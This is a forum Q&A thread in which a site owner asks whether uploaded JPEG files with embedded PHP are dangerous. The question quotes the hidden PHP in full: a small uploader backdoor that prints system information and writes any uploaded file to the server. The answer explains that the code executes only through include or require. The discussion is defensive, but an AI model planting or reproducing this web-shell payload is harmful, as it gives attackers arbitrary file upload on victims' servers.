# user uploaded jpg file that contains php code - is this a potential virus

Tags: php, jpeg, virus

A user uploaded some jpg images that seem to contain some php code. File starts with ÿØÿà followed by NUL DLE JFIF NUL SOH SOH SOH NUL `NUL` NUL NUL ÿá NUL SYN Exif NUL NUL II* ... (lots of more null charcters, etc.). Then the following php code:

```
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
  if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
      else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
```

followed by lots of binary code. The image shows a foot with black (like putting the foot on a scanner or copier).

Are those images potentially dangerous? If yes, how.

Answer (score 1, accepted):

Yes. This is a code-injection that exploits a known bug, read more: http://php.webtutor.pl/en/2011/05/13/php-code-injection-a-simple-virus-written-in-php-and-carried-in-a-jpeg-image/

These images only execute the code if your php script uses `require($image)` or `include($image)` to display your images, otherwise, don't worry. Don't forget to track the user and possibly include him into a blacklist :)